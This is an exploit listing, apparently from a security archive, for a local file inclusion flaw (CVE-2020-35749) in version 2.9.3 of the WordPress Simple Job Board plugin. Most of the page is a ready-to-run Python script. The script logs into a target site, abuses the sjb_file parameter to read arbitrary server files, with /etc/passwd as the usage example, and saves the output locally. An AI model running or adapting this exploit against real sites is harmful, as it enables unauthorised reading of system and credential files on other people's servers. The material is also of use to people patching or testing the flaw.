WordPress Simple Job Board 2.9.3 Local File Inclusion

WordPress Simple Job Board plugin version 2.9.3 suffers from a local file inclusion vulnerability.


MD5 | e059abbfdfefc909ce027e4265e3e84b

# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Date: 2022-02-06
# Exploit Author: Ven3xy
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip
# Version: 2.9.3
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2020-35749


import requests
import sys
import time

class color:
HEADER = '\033[95m'
IMPORTANT = '\33[35m'
NOTICE = '\033[33m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
UNDERLINE = '\033[4m'
LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]


def banner():
run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8
Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__
Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888
Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888
Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888
Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/
888 888 \n'''
run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n'''
run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
print(run+run2+run3)



if (len(sys.argv) != 5):
banner()
print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")
print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")
exit()

else:
banner()
fetch_path = sys.argv[2]
print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)
time.sleep(3)
target_url = sys.argv[1]
usernamex = sys.argv[3]
passwordx = sys.argv[4]
print("\n")
login = target_url+"wp-login.php"
wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path
username = usernamex
password = passwordx

with requests.Session() as s:
headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }

post_data={ 'log':username, 'pwd':password,
'wp-submit':'Log In','redirect_to':wp_path,
'testcookie':'1'
}

s.post(login, headers=headers, data=post_data)
resp = s.get(wp_path)

out_file = open("output.txt", "w")
print(resp.text, file=out_file)
out_file.close()
print(color_random[4]+resp.text)
out = color_random[5]+"\n[+] Output Saved as: output.txt\n"
print(out)


Related Posts